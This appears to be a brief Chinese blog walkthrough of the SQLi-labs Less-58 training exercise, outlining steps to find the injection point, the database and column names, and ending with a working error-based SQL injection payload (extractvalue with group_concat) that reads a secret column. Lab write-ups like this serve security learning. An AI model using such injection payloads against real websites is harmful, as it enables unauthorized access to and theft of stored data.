Sqli labs less 58

本题的输入次数限制为5

1.判断注入点

 

 

 2.查看当前库和数据库 ~6YVFTRPF6D~

 

 

 3.找列名 ~id,sessid,secret_ZQ3W,tryy~

 

 

 4.获取flag ?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_ZQ3W) from 6YVFTRPF6D),0x7e))--+

 

posted @ 2021-09-24 17:04  Nuyoah_QQ  阅读(26)  评论(0)    收藏  举报